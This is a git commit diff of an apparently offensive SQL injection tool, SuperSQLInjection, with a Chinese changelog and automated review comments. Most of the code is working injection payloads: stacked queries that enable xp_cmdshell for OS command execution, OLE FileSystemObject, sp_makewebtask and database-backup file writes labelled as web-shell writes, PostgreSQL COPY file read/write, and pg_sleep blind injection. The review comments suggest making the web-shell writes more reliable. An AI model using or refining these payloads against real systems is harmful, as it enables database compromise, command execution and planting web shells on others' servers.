update20181221

20181221 V1.0 正式版---
修复盲注关键字判断机制,自动识别时,关键字相同且状态码相同才认为是true页面,解决在部分情况下可能出现错误500页面也存在同样关键字的问题。
修改SQLServer查询列时,使用char函数方式,避免单引号被过滤导致无法获取列名的问题。
修复SQLServer 执行命令,读写文件时,可能由于语句报错而导致读写文件失败的问题,优化提高成功率。
修复between and绕过时,将16进制字符替换了,导致语句错误而无法获取数据的问题。
修复自动识别在某些情况下跳过了错误显示注入检查。
修复Union注入重复发包判断列情况。
修复自动识别注入,在部分情况下无法正确判断数据库类型的问题。
修改爆出注入配置文件,降低漏报。
优化自动识别注入,如果程序判断支持盲注,会自动尝试使用order by去判断页面列数,提高Union注入检查的速度。
新增支持注入PostgreSQL文件读写功能。
shack2
2018-12-21 16:08:29 +08:00
parent 81f084e9ca
commit b18f7b73f9
14 changed files with 943 additions and 326 deletions


@@ -0,0 +1,12 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace SuperSQLInjection.payload
{
class DBPayload
{
}
}
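Review bot: The new DBPayload class is empty and carries no comment, so its role relative to the per-database payload classes (each of which now ships its own reflection-invoked getShowCanDoFile) cannot be told from the diff. If it is meant to become the common base or interface for those classes, a summary such as `/// Base for the per-database payload classes; currently a placeholder.` would make that intent visible; otherwise the file could be left out until it has members.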


@@ -28,8 +28,6 @@ namespace SuperSQLInjection.payload
//获取列名称
public static String column_value = "(select column_name from information_schema.columns where table_schema='{dbname}' and table_name='{table}' limit {index},1)";
public static String bool_length = "char_length({data})";
public static String bool_value = "ascii(mid({data},{index},1))";
public static String mid_value = "(mid({data},{index},1))";
@@ -370,6 +368,16 @@ namespace SuperSQLInjection.payload
String data = data_value_orderBy.Replace("{columns}", column).Replace("{orderby}", orderBy).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
return data;
}
/// <summary>
/// 反射条调用,加载显示支持的文件操作
/// </summary>
/// <returns></returns>
public static List<String> getShowCanDoFile() {
List<String> list = new List<String>();
list.Add("MySQL Load_File读文件");
list.Add("MySQL Union写文件");
return list;
}
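Review bot: The getShowCanDoFile added in the second hunk is, by its own summary, located by reflection, but nothing in the code states that contract, so a rename or signature change would only fail at runtime. I would replace the summary `/// 反射条调用,加载显示支持的文件操作` with `/// Invoked by reflection (looked up by name): do not rename or change the signature. Returns the file-operation labels shown for this database.`, which also fixes the typo. As far as the hunk shows the returned strings are display labels; if callers also dispatch on them, that should be said here too, since a changed label would then silently disable an operation.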


@@ -11,7 +11,7 @@ namespace SuperSQLInjection.payload
public static String path = "config/vers/postgresql.txt";
public static List<String> vers = FileTool.readFileToList(path);
public static String char_length = "(select char_length({data}))";
public static String char_length = "(char_length({data}))";
//数据库数量
public static String dbs_count = "(select count(distinct(schemaname)) from pg_tables)";
@@ -34,6 +34,8 @@ namespace SuperSQLInjection.payload
public static String bool_value = "ascii(substring(cast({data} as text),{index},1))";
public static String bool_data = " {data}>{len}";
public static String substr_one_value = "(substring(cast({data} as text),{index},1))";
//获取数据库数量bool方式
@@ -55,6 +57,9 @@ namespace SuperSQLInjection.payload
//bool方式获取值
public static String ver_value = " "+ bool_value + ">{len}";
//bool方式获取值
public static String char_length_val = " " + char_length + ">{len}";
//bool方式获取值
public static String bool_ord_value = " " + substr_one_value + ">{len}";
@@ -80,6 +85,24 @@ namespace SuperSQLInjection.payload
public static String substr_value = "(select substr({data},{start},{len}))";
public static String readFile = " 1=1;drop table if exists ssqlinjection;create table ssqlinjection(data text);copy ssqlinjection from '{path}';--";
public static String createTable = " 1=1;drop table if exists ssqlinjection;create table ssqlinjection (data text);--";
public static String insertLineValue = " 1=1;insert into ssqlinjection(data) values ('{content}');--";
public static String writeFile = " 1=1;copy ssqlinjection(data) to '{path}';--";
public static String drop_table = " 1=1;drop table if exists ssqlinjection;--";
public static String file_content = "(select data from ssqlinjection)";
public static String file_content_Count = "(select count(1) from ssqlinjection)";
public static String file_content_data = "(select data from ssqlinjection offset {index} limit 1)";
public static String getBoolDataBySleep(String data,int maxTime)
{
return " 1=(case when ((" + data + ")>{len}) then (select 1 from pg_sleep(" + maxTime + ")) else 1 end)";
@@ -90,6 +113,8 @@ namespace SuperSQLInjection.payload
return " 1=(case when ((" + data + ")) then (select 1 from pg_sleep(" + maxTime + ")) else 1 end)";
}
/// <summary>
///
@@ -108,46 +133,17 @@ namespace SuperSQLInjection.payload
return error_value.Replace("{data}", d);
}
public static String creatMySQLReadFileByUnion(int columnsLen, int showIndex,String fill,String data)
public static String getReadFilePayload(String path)
{
StringBuilder sb = new StringBuilder();
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append(concatMySQLColumn(data) + ",");
}
else
{
sb.Append(fill+",");
}
}
return sb.Remove(sb.Length - 1, 1).ToString();
return readFile.Replace("{path}", path);
}
public static String creatMySQLWriteFileByUnion(int columnsLen, int dataIndex,String fill, String path,String content)
public static String getInsertLineValue(String content)
{
StringBuilder sb = new StringBuilder(" 1=1 union select ");
for (int i = 1; i <= columnsLen; i++)
{
if (i == dataIndex)
{
sb.Append(Tools.strToHex(content,"UTF-8")+",");
}
else
{
sb.Append(fill+",");
}
}
sb.Remove(sb.Length - 1, 1);
sb.Append(" into dumpfile '"+path+"'");
return sb.ToString();
return insertLineValue.Replace("{content}", content);
}
public static String getWriteFilePayload(String path)
{
return writeFile.Replace("{path}", path);
}
public static String getUnionDataValue(int columnsLen, int showIndex, String dataPayLoad, String dbname, String table, String index)
{
@@ -167,6 +163,9 @@ namespace SuperSQLInjection.payload
sb.Remove(sb.Length - 1, 1);
return union_value.Replace("{data}", sb.ToString());
}
public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
{
StringBuilder sb = new StringBuilder();
@@ -208,7 +207,17 @@ namespace SuperSQLInjection.payload
return data;
}
/// <summary>
/// 反射条调用,加载显示支持的文件操作
/// </summary>
/// <returns></returns>
public static List<String> getShowCanDoFile()
{
List<String> list = new List<String>();
list.Add("PostgreSQL Copy写文件");
list.Add("PostgreSQL Copy读文件");
return list;
}
}
}
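Review bot: getInsertLineValue in the sixth hunk substitutes the file content unchanged into `insert into ssqlinjection(data) values ('{content}')`, so any single quote in the content (most web shells contain one) breaks the statement, and because the stacked `;` batch then errors the whole write fails. The MySQL union writer removed in the same hunk hex-encoded the content via Tools.strToHex, and the commit message says the SQL Server path was moved to char() for the same reason; the PostgreSQL path should do the equivalent, e.g. `public static String insertLineValue = " 1=1;insert into ssqlinjection(data) values (convert_from(decode('{content}','hex'),'UTF8'));--";` with getInsertLineValue passing the hex string of the content, provided the helper emits bare hex digits (I cannot see strToHex here; at minimum `content.Replace("'", "''")` avoids the syntax error). The same raw substitution applies to `{path}` in getReadFilePayload and getWriteFilePayload, although that value is operator supplied. A comment on readFile/writeFile that server-side COPY TO/FROM a file requires superuser or, on PostgreSQL 11+, the pg_read_server_files/pg_write_server_files roles would also help the operator tell a permission failure from a broken injection point.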


@@ -69,17 +69,23 @@ namespace SuperSQLInjection.payload
//cmd
public static String createTable = " 1=1;drop table ssqlinjection;create table ssqlinjection(id int primary key identity,data varchar(8000));exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;declare @cmd varchar(8000);set @cmd={cmd};insert into ssqlinjection(data) exec [master]..[xp_cmdshell] @cmd;select 1 where 1=1 ";
public static String createTableAndExecCmd = " 1=1;create table ssqlinjection(id int primary key identity,data varchar(8000));exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;declare @cmd varchar(8000);set @cmd={cmd};insert into ssqlinjection(data) exec [master]..[xp_cmdshell] @cmd;select 1 where 1=1 ";
public static String cmdData = "cast((select top 1 data from ssqlinjection where id={index}) as varchar(8000))";
public static String cmdDataCount = "(select (select count(*) from ssqlinjection))";
public static String dropTable = " 1=1;drop table ssqlinjection;select 1 where 1=1 ";
public static String dropWriteFileBackUpTableAndDropDB = " 1=1;drop table [ssqlinjection]..[data];drop database ssqlinjection;select 1 where 1=1 ";
public static String createWriteFileBackUpTable = " 1=1;create table [ssqlinjection]..[data] (content image);select 1 where 1=1 ";
public static String createWriteFileBackUpDB = " 1=1;create database ssqlinjection;select 1 where 1=1 ";
//文件读写
public static String witeFileByFileSystemObject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);set @data={data};declare @path varchar(4000);set @path={path};exec [master]..[sp_oacreate] 'scripting.fileSystemObject',@object out;exec [master]..[sp_oamethod] @object,'createtextfile',@file output,@path;exec [master]..[sp_oamethod] @file,'write',null,@data;exec [master]..[sp_oamethod] @file,'close',null;select 1 where 1=1 ";
public static String witeFileBySP_MakeWebTask = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'web assistant procedures',1;reconfigure;declare @d varchar(8000);set @d={data};declare @p varchar(4000);set @p={path};exec sp_makewebtask @p, @d;select 1 where 1=1 ";
public static String witeFileByBackDataBase = " 1=1;drop database ssqlinjection;create database ssqlinjection;drop table [ssqlinjection]..[data];create table [ssqlinjection]..[data] (content image);insert into [ssqlinjection]..[data](content) values({data});declare @s varchar(8000);set @s={path} backup database ssqlinjection to disk=@s;select 1 where 1=1 ";
public static String readFileByFileSystemobject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);exec [master]..[sp_oacreate] 'scripting.filesystemobject',@object out;exec [master]..[sp_oamethod] @object,'OpenTextFile',@file output,'{path}';drop table ssqlinjection;create table ssqlinjection (data varchar(8000));exec [master]..[sp_oamethod] @file,'read',@data out,8000;insert into ssqlinjection(data) values(@data);select 1 where 1=1 ";
public static String witeFileByBackDataBase = " 1=1;insert into [ssqlinjection]..[data](content) values({data});declare @s varchar(8000);set @s={path} backup database ssqlinjection to disk=@s;select 1 where 1=1 ";
public static String readFileByFileSystemobject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);exec [master]..[sp_oacreate] 'scripting.filesystemobject',@object out;exec [master]..[sp_oamethod] @object,'OpenTextFile',@file output,'{path}';create table ssqlinjection (data varchar(8000));exec [master]..[sp_oamethod] @file,'read',@data out,8000;insert into ssqlinjection(data) values(@data);select 1 where 1=1 ";
//读文件的的payload
public static String file_content = "(select data from ssqlinjection)";
@@ -259,5 +265,18 @@ namespace SuperSQLInjection.payload
return payload;
}
/// <summary>
/// 反射条调用,加载显示支持的文件操作
/// </summary>
/// <returns></returns>
public static List<String> getShowCanDoFile()
{
List<String> list = new List<String>();
list.Add("SQLServer FileSystemObject写文件");
list.Add("SQLServer Sp_MakeWebTask写文件");
list.Add("SQLServer 备份写WebShell(有多余数据)");
list.Add("SQLServer FileSystemObject读文件");
return list;
}
}
}
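Review bot: The payloads in the first hunk (createTableAndExecCmd, witeFileByFileSystemObject, witeFileBySP_MakeWebTask, readFileByFileSystemobject) enable `xp_cmdshell`, `ole automation procedures` and `web assistant procedures` through sp_configure, and nothing in the diff turns them back off, while the new dropTable and dropWriteFileBackUpTableAndDropDB cleanup only removes the table and database. That leaves the target more exposed after an engagement than before it; I would add matching restore payloads, e.g. `public static String disableCmdShell = " 1=1;exec sp_configure 'xp_cmdshell',0;reconfigure;exec sp_configure 'show advanced options',0;reconfigure;select 1 where 1=1 ";` plus the same for the two other options, and issue them from the same cleanup path. Separately, sp_makewebtask was dropped from SQL Server some releases ago (around 2008, as far as I recall), so a comment on witeFileBySP_MakeWebTask noting that failure is expected on current targets would save the operator a debug cycle; readFileByFileSystemobject also reads at most 8000 characters (`'read',@data out,8000`), which is worth stating in the label or a comment.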